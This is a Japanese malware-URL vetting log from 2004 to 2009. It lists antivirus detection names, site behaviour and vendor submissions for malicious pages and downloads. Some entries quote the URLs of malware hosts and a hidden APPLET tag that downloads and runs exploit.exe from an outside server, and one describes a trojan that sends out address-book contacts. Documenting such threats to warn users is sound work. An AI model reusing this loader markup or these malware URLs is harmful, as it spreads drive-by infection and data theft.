他の方の結果では「水着女性の画像。ウイルス反応ありです。」 |
[2007/02/21] | 2007/02/19 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_AGENT.IOP として検出するよう対応、とのこと。 実際に 2007/02/19 にDLしたファイルからウィルス名:TROJ_AGENT.IOP を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 2007/02/19 から今日までの間にファイルの置き換えがあったと推測される。 |
[2007/05/20] | 再確認。ウィルス名:BKDR_AGENT.QHU |
[2009/12/27] | ファイルサイズ:585 KB 。いくつかのウィルス駆除ソフトで反応がある。 |
[2009/12/27] | ファイルサイズ:585 KB 。いくつかのウィルス駆除ソフトで反応がある。 |
[2008/12/07] | こんな感じ のページだが、ウィルス名:EXPL_EXECOD.A+EXPL_ANICMOO.GEN を検出。
ウィルス検出後、「about:blank」になり、真っ白なページになる。 しかし、2回目の確認では、こんな感じ のページを表示したままの状態であった。しかもバスター無反応であった。 |
[2008/12/07] | こんな感じ のページだが、ウィルス名:EXPL_ANICMOO.GEN を検出。 |
[2008/12/07] | ウィルス名:EXPL_ANICMOO.GEN |
[2008/12/07] | こんな感じ のページ。バスター無反応だが、他社製ウィルス駆除ソフトでは反応があると思われる。
このサイトは、'Microsoft Corporation'からの'Microsoft HTMLヘルプ コントロール'アドオンを実行しようとしている。 |
[2008/12/07] | ウィルス名:TSPY_QQPASS.DHA |
[2008/12/07] | 真っ白なページだが、ウィルス名:EXPL_EXECOD.A を検出。 |
[2007/05/20] | 2007/02/19 にトレンドマイクロ社に中身の「Card Export II _2.0x_all_keygen.exe」ファイルを提出。
2007/02/21 にその結果の連絡があり、ウィルス名:CRCK_CARDXPORT.A として検出するよう対応、とのこと。 実際に 2007/02/19 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:CRCK_CARDXPORT.A を検出することを確認。 2007/02/19 から今日までのファイルの置き換えは無いと推測される。 |
[2009/03/13] | やたらと長い名前の圧縮ファイルが落ちてくる。解凍すると「fofocas.exe」ファイルが現れるが、ウィルス名:TROJ_INJECT.ADX を検出。 |
[2007/03/11] | ウィルス名:TSPY_DELF.DYJ |
[2007/03/11] | ウィルス名:TSPY_DELF.DSM |
[2006/05/30] | ウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y |
[2008/10/12] | こんな感じ の中国系サイトだが、ウィルス名:JS_AGENT.ARUY を検出。
このサイトは、'RealNetworks,Inc.'からの'RealPlayer plug-in for Internet Explorer'アドオンを実行しようとしている。 ソースを見ると、script src で //pickw.cn/ を呼び出しているのが原因。 |
[2005/01/14] | ウィルス名:HTML_RIDER.A+Possible_Virus+JAVA_BYTEVER.A+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1+JS_OBJDATA.A
しかし、踏むタイミングにより未検出のウィルスもある。 /new/index.htmlとhome.htmlと/exploit.htmと/fuck.htmの4つのページを呼び出し、 /new/index.htmlはexe呼び出し。/exploit.htmはHTML_RIDER.A、/fuck.htmはJS_OBJDATA.Aに感染している。 踏むと真っ白なページだが左上のほうにドットサイズの小さな点がある。 そこを右クリックしてソースを見ると//5sec.biz/acc54/exploit.exeを実行しようとしているのが分かる。 そのexeからPossible_Virusなるウィルスを検出。 |
[2005/05/14] | 改めて確認。ウィルス名:JS_IFRAMEBO.A+HTML_REDIR.A+JS_OBJDATA.A+JAVA_BYTEVER.A
IFRAMEタグで以下の4つのURLを呼び出す。 //ntainspecial.info/c/counter.htm ← ページが無い模様。 //5sec.biz/acc54/exploit.htm ← ウィルス名:HTML_REDIR.A //5sec.biz/acc54/fuck.htm ← ウィルス名:JS_OBJDATA.A //5sec.biz/acc54/new/index.html ← ウィルス名:JAVA_BYTEVER.A。詳細はこのURL解説を参照。 |
[2005/05/14] | ウィルス名:TROJ_MITGLIDER.P |
[2005/05/14] | ウィルス名:HTML_REDIR.A |
[2005/05/14] | ウィルス名:JS_OBJDATA.A |
[2005/05/14] | ウィルス名:JAVA_BYTEVER.A。ソースには以下の記述がある。
<APPLET ARCHIVE="classload.jar" CODE="GetAccess.class" WIDTH=1 HEIGHT=1> <PARAM NAME="ModulePath" VALUE="http://5sec.biz/acc54/exploit.exe"></APPLET> JAVAアプレットに渡すパラメータを指定しているソース内容だが、言い換えれば、以下。 <JAVAアプレットURL="classload.jar" JAVAアプレットファイル名="GetAccess.class" 横幅=1 縦幅=1> <パラメータ名="ModulePath" パラメータ値="http://5sec.biz/acc54/exploit.exe"></APPLET> //5sec.biz/acc54/classload.jar ← JAVAアプレットURLだが404。 //5sec.biz/acc54/exploit.exe ← パラメータ値だがウィルス名:TROJ_MITGLIDER.Pを検出。 |
[2005/09/10] | 海外アダルトサイト。ウィルス名:JAVA_BYTEVER.A
掘っていくとスパイウェアがある。 |
[2005/02/05] | ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.A-1。閉じると全画面表示。
このサイトは不定期的に更新しているらしい。 |
[2005/09/09] | 再確認。海外アダルトサイト。踏むたびに表示される画像が違う。
踏むとウィルス名:DIAL_269.Bを検出、このまま約20秒くらい放っておくとウィルス名:JAVA_BYTEVER.Aを検出。 稀に別窓表示がある。別窓表示した時はウィルス名:JAVA_BYTEVER.Aを検出。 元の//60pictures.com/を閉じるとランダムで色々なアダルトサイトを1〜2枚新窓表示。 この新窓表示で何回か確認すると、全画面表示のほうが多く、全画面表示を閉じると別の全画面表示を呼び出すものもある。 新窓表示はランダム的に表示するらしく、ウィルス未検出の時もあり、ウィルスを検出する時もあった。 その時、検出したウィルス名は、JAVA_BYTEVER.A 、JAVA_BYTEVER.A-1 。 |
[2004/12/04] | ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.A-1 |
[2005/08/28] | 再確認。踏むと海外アダルトサイト。ウィンドウのサイズを勝手に最大にする場合もあるらしい。
これ を表示する。拒否すると少しの間、何も無いが、その後、ウィルス名:JAVA_BYTEVER.Aを検出。 これは、IFRAMEタグで//63.218.226.78/connect.php?id=3を呼び出すため。 |
[2005/09/10] | ランダムで色々な海外アダルトサイトに飛ぶ。他の方の鑑定では「」内の以下。
「ランダムで色々な洋エロサイトに飛ばされます。何回か踏んでみたら、プロセスで終了しないと脱出できない有害サイトや、Exploit.VBS.Phel.Aを検出する有害サイトなどが開きました。」 何回か確認してみると、以下の結果になった。 1回目、//lustgal.com/?id=60pictures.comに飛ぶ。バスター無反応。 2回目、//galleryplanet.com/?id=60pictures.comに飛ぶ。閉じると全画面表示。 3回目、「ページを表示できません」となる。 4回目、//unitedtgp.com/?id=60pictures.comに飛ぶ。バスター無反応。 5回目、//teencake.com/?id=60pictures.comに飛び、ウィルス名:JS_DLOADER.Iを検出。 6回目、//mangosex.com/?id=60pictures.comに飛び、ウィルス名:JS_DLOADER.Iを検出。 7回目以降、何度確認しても「ページを表示できません」であった。 |
[2005/10/27] | 再確認。海外アダルトサイトだが、踏むたびに表示されるサイトが違う。そのサイトによって、全画面表示等あり。 |
[2006/01/15] | 他の方の結果では 「洋エロサイトが大窓で開きます。リンク先で、プロセスから脱出しないと閉じれない有害サイト開かれました。」 |
[2006/05/18] | 「大窓で洋エロサイトが開き、閉じても閉じても別サイトを開かれます。踏むタイミングで開かれるサイトが変わり、漏れの環境ではウイルスサイトが開きました。Kaspersky で Trojan-Downloader.JS.IstBar.x などを検出。」 |
[2008/11/23] | ウィルス名:PAK_GENERIC.001 |
[2006/08/29] | 2006/08/12 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TSPY_LINEAGE.AXJ として検出するよう対応、とのこと。 2006/08/12 にDLしたファイルからウィルス名:TSPY_LINEAGE.AXJ を検出することを確認。 また、今日改めて当該URLからファイルをDLしてみてもウィルス名:TSPY_LINEAGE.AXJ を検出することを確認。 |
[2006/08/10] | ウィルス名:PE_LOOKED.AG-O |
[2006/09/07] | ウィルス名:PE_LOOKED.BF-O |
[2006/08/29] | 2006/08/12 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:BKDR_HUPIGON.BHS として検出するよう対応、とのこと。 2006/08/12 にDLしたファイルからウィルス名:BKDR_HUPIGON.BHS を検出することを確認。 また、今日改めて当該URLからファイルをDLしてみてもウィルス名:BKDR_HUPIGON.BHS を検出することを確認。 |
[2006/08/29] | 2006/08/12 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TSPY_DELF.CHW として検出するよう対応、とのこと。 2006/08/12 にDLしたファイルからウィルス名:TSPY_DELF.CHW を検出することを確認。 また、今日改めて当該URLからファイルをDLしてみてもウィルス名:TSPY_DELF.CHW を検出することを確認。 |
[2006/08/29] | 2006/08/12 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TSPY_LINEAGE.AXK として検出するよう対応、とのこと。 2006/08/12 にDLしたファイルからウィルス名:TSPY_LINEAGE.AXK を検出することを確認。 また、今日改めて当該URLからファイルをDLしてみてもウィルス名:TSPY_LINEAGE.AXK を検出することを確認。 |
[2005/10/22] | ウィルス名:TROJ_SMALL.SM |
[2007/01/13] | 2006/10/11 の時点でバスター無反応。2006/10/11 にトレンドマイクロ社にファイルを提出。
2006/10/13 にその結果の連絡があり、「弊社では正常と判断したファイルで、検出対応は行わない。」とのこと。 しかし、今日改めて 2006/10/13 にDLしたファイルを調べるとウィルス名:DIAL_AGENT.OAT を検出する。 ちなみに上記2つのURLは今日確認してみると以下のURLに飛ばされ、ファイルはDL出来なくなっている。 //www.mmaaxx.com/index.html?affid=us3899 ← 日本語のアダルトサイト。 |
[2005/10/22] | ウィルス名:TROJ_BLOBUS.A |
[2007/01/13] | 2006/10/11 の時点でバスター無反応。2006/10/11 にトレンドマイクロ社にファイルを提出。
2006/10/13 にその結果の連絡があり、「弊社では正常と判断したファイルで、検出対応は行わない。」とのこと。 しかし、今日改めて 2006/10/13 にDLしたファイルを調べるとウィルス名:DIAL_AGENT.OAT を検出する。 ちなみに上記2つのURLは今日確認してみると以下のURLに飛ばされ、ファイルはDL出来なくなっている。 //www.mmaaxx.com/index.html?affid=us3899 ← 日本語のアダルトサイト。 |
[2008/07/15] | ウィルス名:TSC_GENCLEAN+PAK_Generic.001 |
[2006/10/01] | 海外アダルトサイトだが、何かを読み込んでいる。
ソースを見るとIFRAMEタグで以下の @ を呼び出している。更に @ は A を呼び出している。 しかし、A は確認時には404であったので、この時は無害。しかし、時間帯により、復活する可能性もあるので注意。 @、//85.255.113.22/inc/przz.html A、//85.255.113.10/?to=przz&from=in |
[2007/04/21] | 2007/04/05 にトレンドマイクロ社にファイルを提出。
2007/04/17 にその結果の連絡があり、ウィルス名:BKDR_HUPIGON.DLK として検出するよう対応、とのこと。 実際に 2007/04/05 にDLしたファイルからウィルス名:BKDR_HUPIGON.DLK を検出することを確認。 しかし、今日改めて当該URLを確認してみると404であった。 |
[2009/08/04] | ファイルサイズ:23.8 KB 。ウィルス名:PAK_GENERIC.001 |
[2009/08/04] | ファイルサイズ:26.0 KB 。ウィルス名:PAK_GENERIC.002 |
[2009/08/04] | ファイルサイズ:69.8 KB 。ウィルス名:MAL_DLDER |
[2007/04/15] | 真っ白なページ。バスター2007が危険なWebサイトとして警告する。 |
[2009/03/15] | 拡張子不明の長い名前のファイルが落ちてくるが、ウィルス名:TROJ_BANLOAD.MCL を検出。 |
[2008/11/15] | ウィルス名:EXPL_ANICMOO.GEN |
[2008/11/15] | ウィルス名:TROJ_AGENT.AIAV |
[2008/11/15] | 真っ白なページだが、ウィルス名:EXPL_ANICMOO.GEN を検出。 |
[2009/05/19] | ファイルサイズ:151 KB 。バスター無反応だが、多くの他社製ウィルス駆除ソフトで反応がある。
バックドア型トロイの木馬のようである。 |
[2009/05/19] | ファイルサイズ:60.3 KB 。ウィルス名:CRYP_UPACK |
[2009/03/15] | 拡張子不明の長い名前のファイルが落ちてくる。ファイルサイズ:102 KB 。ウィルス名:PAK_GENERIC.001 を検出。 |
[2009/03/15] | 長い名前の圧縮ファイルが落ちてくる。ファイルサイズ:57.0 KB 。
解凍すると「flagrasporn・exe」という名前の拡張子不明のファイルが現れる。exeファイルかどうかは不明。 この拡張子不明のファイルからウィルス名:PAK_GENERIC.001 を検出。 |
[2004/09/27] | //gb.bbs.ws/book.php?book=xbookを呼ぶ。 |
[2005/04/19] | 何回か確認してみると、このURLは同じなのだが、踏むたびに表示されるものが違う。
別窓は このアドレス窓 のアドレスバーが無いものを表示。 FRAMEタグで//gb.bbs.ws/book.php?book=xbookを呼んでいる。詳細はこのURL解説を参照。 |
[2005/11/15] | 他の方の結果は →「ウイルス反応あり。Download.Trojan 」 |
[2005/11/15] | 再確認。「ページを表示できません」であった。 |
[2004/10/17] | ウイルス+スパイウェア憑きのエロサイト。
ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER-1+HTML_REDIR.A+JS_EXCEPTION.GEN //gb.bbs.ws/book.php?book=blackpostを呼ぶ。 |
[2006/05/02] | 他の方の結果は以下の「」内。
「踏むと「Enter Here」とだけ書かれたリンクがあり、そこを踏むとランダムで海外アダルトサイトに飛ばす仕組みのようです。 過去ウイルスサイト騒ぎになった「BBS LOLITA」(ダークロリータなどとも呼ばれていました)のURLもタイミングによっては飛ぶかもしれません。 当方のKAV5ではウイルス反応無しですが踏まないことをお勧めします。」 |
[2005/06/10] | ウィルス名:JAVA_BYTEVER.A
IFRAMEタグで//99fh.com/~red/tb/tb.php?8268809 を呼んでいるが、jscriptで一部エンコードされている。 |
[2005/07/07] | 日本語のアダルトサイト。ここまで無害だが、画像をクリックするとバスターがウィルス名:TROJ_MYFTU.A を検出。
画像は「mov.exe」というファイルをDLするようにリンクされている。確認した画像のexeリンク先一覧は以下。 //99movie.tv/showMovie.php?C=l^v^lw&MV=503504 //99movie.tv/showMovie.php?C=l^v^lw&MV=503516 //99movie.tv/showMovie.php?C=l^v^lw&MV=503525 //99movie.tv/showMovie.php?C=l^v^lw&MV=503539 //99movie.tv/showMovie.php?C=l^v^lw&MV=503543 //99movie.tv/showMovie.php?C=l^v^lw&MV=503547 //99movie.tv/showMovie.php?C=l^v^lw&MV=503550 //99movie.tv/showMovie.php?C=l^v^lw&MV=503560 このexeファイルが実行されるとProgram Files内に「MSINET.OCX」「MV99.EXE」というファイルを作成される。 作成されるとアドレス帳やアウトルックのアドレスの収集を行い、外部に送信しようとする。 |
[2005/07/07] | ウィルス名:TROJ_MYFTU.A |